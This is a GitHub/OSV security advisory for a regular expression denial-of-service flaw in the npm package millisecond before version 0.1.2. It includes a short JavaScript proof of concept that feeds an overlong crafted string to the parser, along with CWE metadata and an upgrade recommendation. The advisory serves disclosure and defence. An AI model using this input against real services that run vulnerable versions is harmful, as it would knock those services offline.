GHSA-m489-xr35-fjxr

Suggest an improvement
Source
https://github.com/advisories/GHSA-m489-xr35-fjxr
Import Source
https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/09/GHSA-m489-xr35-fjxr/GHSA-m489-xr35-fjxr.json
JSON Data
https://api.osv.dev/v1/vulns/GHSA-m489-xr35-fjxr
Published
2021-09-22T20:35:08Z
Modified
2021-09-22T20:34:42Z
Summary
Regular Expression Denial of Service in millisecond
Details

Versions of millisecond prior to 0.1.2 are affected by a regular expression denial of service vulnerability when extremely long version strings are parsed.

Proof of concept

var ms = require('millisecond');
var genstr = function (len, chr) {
   var result = "";
   for (i=0; i<=len; i++) {
       result = result + chr;
   }

   return result;
}

ms(genstr(process.argv[2], "5") + " minutea");

Recommendation

Update to version 0.1.2 or later.

Database specific
{
    "cwe_ids":  [
        "CWE-1333",
        "CWE-400"
    ],
    "github_reviewed":  true,
    "github_reviewed_at":  "2021-09-22T20:34:42Z",
    "nvd_published_at":  null,
    "severity":  "MODERATE"
}
References

Affected packages

npm / millisecond

Package

Affected ranges

Type
SEMVER
Events
Introduced
0 Unknown introduced version / All previous versions are affected
Fixed
0.1.2

Database specific

source
"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/09/GHSA-m489-xr35-fjxr/GHSA-m489-xr35-fjxr.json"